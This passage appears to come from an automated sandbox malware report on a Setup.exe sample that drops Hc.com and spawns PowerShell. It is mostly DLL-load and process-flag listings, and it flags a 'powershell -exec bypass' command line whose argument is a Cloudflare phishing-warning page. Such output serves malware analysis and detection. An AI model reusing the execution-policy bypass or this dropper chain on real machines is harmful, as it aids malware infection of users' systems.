            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Setup.exeStatic file information: File size 73409696 > 1048576
            Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2341213621.0000000007879000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Suspicious powershell command line found
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="RskevRB4u02FLFVl.7vQxYmyVWENwhkb2yKr86BmjBM-1735000458-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="RskevRB4u02FLFVl.7vQxYmyVWENwhkb2yKr86BmjBM-1735000458-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <Jump to behavior
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002B0315 push cs; retn 002Ah11_2_002B0318
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_00280DE6 push ecx; ret 11_2_00280DF9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_04F70C6D push ebx; iretd 16_2_04F70C7A

            Persistence and Installation Behavior

            barindex
            Drops PE files with a suspicious file extension
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\280366\Hc.comJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\280366\Hc.comJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002F26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_002F26DD
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0027FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_0027FC7C
            Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
